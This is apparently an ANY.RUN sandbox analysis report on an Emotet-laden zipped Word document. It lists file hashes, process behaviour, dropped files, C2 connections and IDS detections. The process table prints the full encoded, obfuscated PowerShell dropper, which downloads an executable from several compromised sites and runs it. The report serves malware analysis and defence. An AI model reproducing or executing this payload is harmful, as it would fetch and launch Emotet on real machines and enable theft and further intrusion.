analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

IW0560913942UR.zip

Full analysis: https://app.any.run/tasks/62d46cb2-3cd8-48d9-81b5-c8976e5c1d2f
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 20, 2020, 06:54:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
emotet
emotet-doc
Indicators:
MIME: application/zip
File info: Zip archive data, at least v5.1 to extract
MD5:

04490F8FEFDB8890BF31C76A70AF6423

SHA1:

C6EA2FC7E7A08994CEFAD42E5D31302B8FEDF0D8

SHA256:

D16D3AF42E5A85C06AD131F45CA8CF3461A23519C2B99013E4F6DE1CB098B645

SSDEEP:

1536:tkpg2MIEkWTzp39UJy8iaJ/Ga8H5wdoV1h6AmK8O+dbcumybMHJAzbDn:tke2o5RNf1apGFVV/6AHt2m+zbDn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • werdiagcontroller.exe (PID: 2256)
      • Yzsk_77.exe (PID: 3624)
    • Connects to CnC server

      • werdiagcontroller.exe (PID: 2256)
    • Changes the autorun value in the registry

      • werdiagcontroller.exe (PID: 2256)
    • EMOTET was detected

      • werdiagcontroller.exe (PID: 2256)
  • SUSPICIOUS

    • PowerShell script executed

      • POwersheLL.exe (PID: 968)
    • Executed via WMI

      • POwersheLL.exe (PID: 968)
      • Yzsk_77.exe (PID: 3624)
    • Creates files in the user directory

      • POwersheLL.exe (PID: 968)
    • Starts itself from another location

      • Yzsk_77.exe (PID: 3624)
    • Executable content was dropped or overwritten

      • POwersheLL.exe (PID: 968)
      • Yzsk_77.exe (PID: 3624)
    • Reads Internet Cache Settings

      • werdiagcontroller.exe (PID: 2256)
  • INFO

    • Manual execution by user

      • WINWORD.EXE (PID: 928)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 928)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 928)
    • Reads settings of System Certificates

      • POwersheLL.exe (PID: 968)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: IW0560913942UR.doc
ZipUncompressedSize: 160857
ZipCompressedSize: 81171
ZipCRC: 0x0f3c0b13
ZipModifyDate: 2020:10:19 22:22:00
ZipCompression: Unknown (99)
ZipBitFlag: 0x0003
ZipRequiredVersion: 51
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
5
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winrar.exe no specs winword.exe no specs powershell.exe yzsk_77.exe #EMOTET werdiagcontroller.exe

Process information

PID
CMD
Path
Indicators
Parent process
2484"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\IW0560913942UR.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
928"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\IW0560913942UR.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
968POwersheLL -ENCOD UwBFAFQAIABBAGIAaQAgACAAKABbAHQAeQBwAGUAXQAoACcAUwB5AFMAdABFACcAKwAnAG0ALgBJAG8ALgBkAEkAUgBFACcAKwAnAEMAJwArACcAdAAnACsAJwBPAHIAWQAnACkAIAAgACkAIAAgADsAIAAgAFMAZQBUAC0AdgBBAHIASQBhAGIAbABFACAAIAA2AEkATwAgACAAKAAgACAAWwBUAFkAcABFAF0AKAAnAFMAJwArACcAWQBzAHQAZQBtAC4AbgBlACcAKwAnAFQALgBzAEUAJwArACcAcgB2AEkAYwBlAFAAJwArACcAbwBJAG4AdABNAGEATgAnACsAJwBhACcAKwAnAEcAJwArACcAZQBSACcAKQAgACkAOwAgAHMAVgAgACAAKAAnADQAMABuACcAKwAnADcAQQAnACkAIAAgACgAIAAgAFsAdAB5AHAARQBdACgAJwBzACcAKwAnAHkAcwBUAEUAbQAnACsAJwAuACcAKwAnAG4ARQBUAC4AUwAnACsAJwBFAEMAJwArACcAVQByAEkAVAB5AHAAcgAnACsAJwBPAFQAbwBDAE8ATAAnACsAJwB0AHkAJwArACcAUABFACcAKQAgACAAKQAgADsAIAAkAEcAZQBoADYAdQB6AF8APQAoACcAQgAnACsAJwBzAGgAXwAnACsAJwBsAHIAXwAnACkAOwAkAEsAdQBmADgAaQAzAHkAPQAkAEoAMQA0AGcAeABkAGEAIAArACAAWwBjAGgAYQByAF0AKAA4ADAAIAAtACAAMwA4ACkAIAArACAAJABVADYAawB6ADUAcQBiADsAJABBAGQAeABlAHYANAB4AD0AKAAnAEcAZQBqAHMAJwArACcAdwBtADgAJwApADsAIAAgACgAIABHAEUAVAAtAEMAaABJAEwAZABJAHQAZQBtACAAVgBhAHIAaQBBAEIAbABlADoAQQBCAEkAKQAuAFYAYQBMAHUARQA6ADoAQwBSAEUAYQBUAGUAZABJAHIAZQBDAHQATwBSAHkAKAAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACAAKwAgACgAKAAnAHsAMAB9ACcAKwAnAEQAagAnACsAJwBxAGsAYQA0ACcAKwAnAG0AewAwAH0AJwArACcAQgAnACsAJwBnAGcAJwArACcANQA2AHkAJwArACcAdAB7ADAAfQAnACkALQBmAFsAQwBoAGEAUgBdADkAMgApACkAOwAkAEUAdQBxAGYANgBtAHAAPQAoACcARABjAGMAMQBwACcAKwAnAGwAJwArACcAcwAnACkAOwAgACgAIAAgAEcAZQBUAC0AdgBhAHIAaQBBAEIATABFACAANgBpAE8AIAApAC4AVgBhAEwAVQBFADoAOgBzAGUAYwBVAFIAaQBUAHkAcABSAE8AdABPAGMAbwBMACAAPQAgACAAIAAkADQAMABuADcAQQA6ADoAdABsAFMAMQAyADsAJABMAHIAMABpADUANwBiAD0AKAAnAEIAJwArACcAbgAnACsAJwA4AHMANgBzAHQAJwApADsAJABZAGUAYwBtADYAXwBrACAAPQAgACgAJwBZAHoAcwBrACcAKwAnAF8ANwA3ACcAKQA7ACQAUgBxAF8AcwAxADgAYgA9ACgAJwBRACcAKwAnAHgAYwBmAG8AeQAnACsAJwAzACcAKQA7ACQATgA3AGMAcwBwADgAbQA9ACgAJwBPAHgAJwArACcAMwAxADUAaQB4ACcAKQA7ACQASwBiADgAOQBwAGQAbwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwBDACcAKwAnAFMAZwBEACcAKwAnAGoAcQBrAGEAJwArACcANABtAEMAJwArACcAUwBnAEIAJwArACcAZwBnADUANgAnACsAJwB5AHQAQwAnACsAJwBTAGcAJwApACAALQBjAFIARQBQAGwAQQBDAGUAIAAgACcAQwBTAGcAJwAsAFsAQwBoAGEAcgBdADkAMgApACsAJABZAGUAYwBtADYAXwBrACsAKAAnAC4AZQB4ACcAKwAnAGUAJwApADsAJABQAGoAdABuADcAdQA2AD0AKAAnAEkAMAA3AGgAcQAnACsAJwBvAGMAJwApADsAJABTAHAAbwB1ADcAMwB3AD0AbgBlAGAAdwAtAE8AYABCAGoAZQBjAFQAIABuAEUAdAAuAFcAZQBiAEMATABJAEUAbgBUADsAJABEAHkAZgBmAF8AeABhAD0AKAAnAGgAJwArACcAdAB0AHAAJwArACcAcwA6ACcAKwAnAC8AJwArACcALwBvAG4AJwArACcAZQBwAGEAbABhAHQAZQAuAGIAaQAnACsAJwB6AC8AdwBwAC8AWQB1AFUAJwArACcAYwBwAHoATQAvACoAaAAnACsAJwB0AHQAJwArACcAcABzADoAJwArACcALwAvAHcAZQBiAGQAYQAnACsAJwBjAGgAaQBlACcAKwAnAHUALgAnACsAJwBjACcAKwAnAG8AbQAnACsAJwAvAHcAcAAtAGEAZABtAGkAbgAvACcAKwAnAEoAJwArACcALwAqAGgAdAAnACsAJwB0ACcAKwAnAHAAOgAvACcAKwAnAC8AcwBtACcAKwAnAGEAbAAnACsAJwBsAGIAJwArACcAYQB0ACcAKwAnAGMAaABsAGkAJwArACcAdgBpACcAKwAnAG4AZwAnACsAJwAuAGMAbwBtACcAKwAnAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AdQBjACcAKwAnAGMARQAvACoAaAAnACsAJwB0AHQAcAA6AC8ALwByAGkAYwAnACsAJwBoACcAKwAnAGUAbABsAGUAbQBhACcAKwAnAHIAaQAnACsAJwBlACcAKwAnAC4AYwBvAG0AJwArACcALwB3AHAALQBhAGQAbQBpAG4ALwB4AGwAVABXACcAKwAnAFcALwAqAGgAJwArACcAdAB0AHAAJwArACcAOgAvACcAKwAnAC8AJwArACcAcgBpACcAKwAnAGMAaABlACcAKwAnAGwAbABlAHMAaABhAGQAbwBhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAJwArACcAbgAnACsAJwAvACcAKwAnAFUAYwByAGsAJwArACcAYwB2ACcAKwAnAHAALwAqAGgAdAB0AHAAJwArACcAOgAvACcAKwAnAC8AaABvACcAKwAnAGwAbwBuACcAKwAnAGMAaAAnACsAJwBpAGwAJwArACcAZQAuAGMAbAAvAHAAdQAnACsAJwByAGUAbABvACcAKwAnAHYAZQAnACsAJwAvAFkANAAvACcAKwAnACoAaAAnACsAJwB0AHQAcAAnACsAJwA6AC8ALwBhACcAKwAnADIAegBhACcAKwAnAHIAYwAnACsAJwBoAGkAdABlAGMAdAAuAGMAbwBtAC8AdwBwAC0AYQAnACsAJwBkAG0AaQAnACsAJwBuAC8ATAAnACsAJwBBAHMAMABQAC8AJwArACcAKgBoAHQAJwArACcAdABwAHMAOgAvAC8AcgBhAHUAbQBmAHUAZQByAG4AZQB1AGUAcwAuACcAKwAnAGUAJwArACcAdQAnACsAJwAvACcAKwAnAGUAcgByAG8AJwArACcAcgAvAEEAJwArACcAdQAnACsAJwBUAGkASAAvACcAKQAuAHMAUABsAEkAVAAoACQAWABnADMAZAA0AG8AawAgACsAIAAkAEsAdQBmADgAaQAzAHkAIAArACAAJABEAG4AMABkAGYAbABmACkAOwAkAEEAcwB0AGUAZgBvAHEAPQAoACcAQQA5ACcAKwAnAGYAcgBiACcAKwAnAGUAZwAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAbABvAHYAdAByAG4AIABpAG4AIAAkAEQAeQBmAGYAXwB4AGEAKQB7AHQAcgB5AHsAJABTAHAAbwB1ADcAMwB3AC4ARABvAHcATgBMAG8AYQBEAGYAaQBsAEUAKAAkAEkAbABvAHYAdAByAG4ALAAgACQASwBiADgAOQBwAGQAbwApADsAJABPAHMANAB4AHEAdAAzAD0AKAAnAFoAMwAnACsAJwBpAHQAdwAnACsAJwAzAGEAJwApADsASQBmACAAKAAoAGcAYABFAFQAYAAtAEkAVABFAE0AIAAkAEsAYgA4ADkAcABkAG8AKQAuAGwARQBOAGcAdABIACAALQBnAGUAIAAyADMAOQAwADUAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACgAJwB3ACcAKwAnAGkAbgAzADIAXwBQACcAKwAnAHIAbwBjACcAKwAnAGUAcwBzACcAKQApAC4AYwBSAGUAQQB0AEUAKAAkAEsAYgA4ADkAcABkAG8AKQA7ACQATABoADAANgA5AGYAdAA9ACgAJwBWAGQANwAnACsAJwBpACcAKwAnADQAMgBhACcAKQA7AGIAcgBlAGEAawA7ACQAVQB0AHkAcwBzADAAcgA9ACgAJwBJAGcAbgAnACsAJwBmADgAJwArACcAbQBqACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAB6AHYAOABpAGwAeAA9ACgAJwBHADgAeABwACcAKwAnADcAXwAnACsAJwBnACcAKQA= C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3624C:\Users\admin\Djqka4m\Bgg56yt\Yzsk_77.exeC:\Users\admin\Djqka4m\Bgg56yt\Yzsk_77.exe
wmiprvse.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2256"C:\Users\admin\AppData\Local\mfc120deu\werdiagcontroller.exe"C:\Users\admin\AppData\Local\mfc120deu\werdiagcontroller.exe
Yzsk_77.exe
User:
admin
Integrity Level:
MEDIUM
Total events
2 467
Read events
1 527
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
3
Text files
2
Unknown types
5

Dropped files

PID
Process
Filename
Type
928WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB386.tmp.cvr
MD5:
SHA256:
968POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\191DXL7835IIJ3ILERAH.temp
MD5:
SHA256:
928WINWORD.EXEC:\Users\admin\Desktop\~$0560913942UR.docpgc
MD5:449F81FB73C459EC7D806AF22273CF48
SHA256:AFB9C750F64C0D6B2627A4808EEE84CEC4391A5B460C7769464E7274FFA8C260
968POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:D6EE8C34E4C28999F00E385C8808E7DE
SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
2484WinRAR.exeC:\Users\admin\Desktop\IW0560913942UR.docdocument
MD5:5757A8F12175246EB7B1696F46807EB4
SHA256:1C98AB8476847336DCF434E658A40E23A898CE637BB774DECAAB9F8715DB95A8
968POwersheLL.exeC:\Users\admin\Djqka4m\Bgg56yt\Yzsk_77.exeexecutable
MD5:4D7E6776A2D5440CF7C2CB73339C6845
SHA256:3D77D28DF72B682400A784B39721AF8D6C176E1BF9DBFD7A2CDBFE694911D215
3624Yzsk_77.exeC:\Users\admin\AppData\Local\mfc120deu\werdiagcontroller.exeexecutable
MD5:4D7E6776A2D5440CF7C2CB73339C6845
SHA256:3D77D28DF72B682400A784B39721AF8D6C176E1BF9DBFD7A2CDBFE694911D215
928WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:AA40ED1E6D9F311926E9219679EC3DF8
SHA256:28CE12945943B103F686BE089CF5F9E2A1A5D542CD31360DC5A7A7984CB9F5CF
968POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2dc45e.TMPbinary
MD5:D6EE8C34E4C28999F00E385C8808E7DE
SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
928WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:DD47FC403F9D145A7A4CDBACC79ECCD3
SHA256:F4CB66F7EC7B02C8D1B6E874119AEB71F55D977156DC7B1BE5F3D32E16E418CF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
968
POwersheLL.exe
111.90.135.17:443
onepalate.biz
Shinjiru Technology Sdn Bhd
MY
unknown
2256
werdiagcontroller.exe
24.230.141.169:80
Midcontinent Communications
US
malicious

DNS requests

Domain
IP
Reputation
onepalate.biz
  • 111.90.135.17
unknown

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO Observed DNS Query to .biz TLD
2256
werdiagcontroller.exe
A Network Trojan was detected
MALWARE [PTsecurity] Emotet
1 ETPRO signatures available at the full report
No debug info